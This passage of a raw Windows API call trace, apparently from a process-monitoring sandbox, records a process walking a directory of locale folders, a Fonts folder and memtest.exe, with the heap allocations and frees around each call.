nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x38) returned 0x3277d68 [0209.558] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.558] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286508 | out: hHeap=0x750000) returned 1 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286468 | out: hHeap=0x750000) returned 1 [0209.559] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x54) returned 0x327a528 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32864e0 | out: hHeap=0x750000) returned 1 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286418 | out: hHeap=0x750000) returned 1 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3277d68 | out: hHeap=0x750000) returned 1 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.559] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0209.559] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x70) returned 0x32405b0 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.559] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.560] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xa8) returned 0x32311e8 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840a0 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840c8 [0209.560] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.560] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xfc) returned 0x3217e98 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840f0 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84118 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84140 [0209.560] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84168 [0209.561] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.561] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.561] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x16c) returned 0x7bfd68 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840c8 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840a0 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84190 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a841b8 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a841e0 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84208 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84230 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84258 [0209.561] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.561] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.562] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.562] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864e0 [0209.562] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0209.562] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x214) returned 0x32ef368 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286490 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84168 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84140 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84118 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840f0 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84280 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842a8 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842d0 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a842f8 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84320 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84348 [0209.562] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84370 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84398 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84258 [0209.563] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0209.563] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x310) returned 0x32ef588 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84230 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84208 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a841e0 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a841b8 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84190 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840a0 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a840c8 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a843c0 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a843e8 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84410 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84438 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84460 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84488 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a844b0 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a844d8 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84500 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84528 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84550 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3a84578 [0209.564] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.564] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32864b8 [0209.565] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286508 [0209.565] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286418 [0209.565] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286468 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0209.565] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863f0 [0209.565] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0209.565] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.565] PeekMessageW (in: 